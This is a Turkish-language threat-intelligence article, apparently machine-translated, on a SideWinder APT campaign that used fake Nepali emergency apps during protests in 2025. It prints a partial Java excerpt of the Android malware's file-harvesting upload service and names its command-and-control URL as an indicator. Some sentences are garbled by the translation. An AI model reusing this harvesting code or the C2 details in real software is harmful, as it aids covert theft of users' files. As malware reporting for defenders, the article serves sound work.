Eylül 2025’in başlarında Nepal genelinde yaygın protestoların patlaması, Sidewinder APT grubu tarafından düzenlenen sofistike bir kampanya için verimli bir zemin sağladı.
Göstericiler hükümet politikalarına ve sosyal medya kısıtlamalarına karşı harekete geçtikçe, tehdit aktörleri meşru acil durum hizmetleri olarak maskelenen kötü niyetli uygulamaları dağıtmak için türbülanstı kullandılar.
Canlı güncellemeler veya yardım isteyen kurbanlar, Nepal yetkililerinin gerçekçi taklitleri tarafından ikna edildi, sadece hem mobil hem de Windows ortamlarından hassas verileri sifonlayan kötü amaçlı yazılım yüklemek için.
SideWinder’ın işlemi çift yönlü bir teslimat mekanizmasına dayanır. Android cihazlarda, kurbanlar Nepal acil servis girişini taklit eden kimlik avı web siteleriyle karşılaşır.
.webp)
Kimlik bilgileri girildikten sonra, site bir APK indirmesine yönlendirilir – tipik olarak adlandırılmış Gen_ashok_sigdel_live.apk– Hangi kullanıcıların canlı haberlere erişme kisvesi altında yüklenir.
.webp)
Bu arada, Windows kullanıcıları indirin Acil acilpapp.exe klonlanmış acil yardım hattı portalından (Şekil 6). Her iki ikili dosyası, veri açığa çıkmasını kolaylaştırmak için kapsamlı izinler (Fil Sistem Erişimi, Mikrofon, Kamera) talep eder.
Strikeready Labs analistleri, grubun katılımı en üst düzeye çıkarmak için jeopolitik olayları kasıtlı olarak kullandığını, kötü amaçlı yükü Al Jazeera gibi saygın satış noktalarından getirilen tuzak içeriğine yerleştirdi.
.webp)
Bu tuzaklar, operasyona güvenilirlik kazandırır ve kötü amaçlı yazılımların teknik olmayan kullanıcıların cursory denetimini atlamasına yardımcı olur. Kurulduktan sonra, mobil arka kapı, belge ve görüntü dosyalarını eksfiltrasyon için filtreleyen bir hizmeti başlatır.
Windows varyantı benzer şekilde çalışır, dosyaları gibi uzantılarla hasat eden arka plan görevlerini ortaya çıkarır. .docx– .pdfVe .xlsx.
Enfeksiyon mekanizması ve izin kötüye kullanımı
Android örneğinin daha yakından incelenmesi, çok iş parçacıklı bir FileUploadService Veri hırsızlığından sorumlu sınıf.
.webp)
Yürütme üzerine, hizmet bir ExecutorService on beş işçiden oluşan bir iplik havuzu ile. Her çalışan, önceden tanımlanmış belge ve görüntü uzantılarını eşleştiren dosyalar için cihaz depolamasını tarar:
public class FileUploadService extends Service {
private static final int THREAD_COUNT = 15;
private final List docExts = Arrays.asList(".txt", ".pdf", ".docx", ".xlsx");
private final List imgExts = Arrays.asList(".jpg", ".png");
private ExecutorService executorService;
@Override
public int onStartCommand(Intent intent, int flags, int startId) {
executorService = Executors.newFixedThreadPool(THREAD_COUNT);
scanAndUpload();
return START_STICKY;
}
private void scanAndUpload() {
for (String ext : docExts) {
// Launch tasks to upload matching files
executorService.submit(() -> uploadFiles(ext));
}
for (String ext : imgExts) {
executorService.submit(() -> uploadFiles(ext));
}
}
} Dosyalar tanımlandıktan sonra, HTTP Post talepleri tanınabilir bir sınır işaretleyici (----qwerty) ağ yakalamasında görünür.
.webp)
Çalıntı tüm dosyalar gönderilir https://playservicess.com/dtta/files.phpSidewinder tarafından kontrol edilen bir C2 uç noktası. Kalıcılık, Android’in ön plan hizmet bildirimleri ve Windows Autostart kayıt defteri girişleri ile korunur.
Meşru görünen kullanıcı arayüzlerinden yararlanarak ve üst düzey izinleri kötüye kullanan Sidewinder, işletme ve kişisel ortamları ihlal edebilen gizli bir enfeksiyon vektörü elde eder.
Güvenlik ekipleri bilinen IOC alanlarını (örneğin, playservicess.com), şüpheli APK kurulumlarını ve çok partili yükler içeren anormal giden trafiği izlemelidir.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.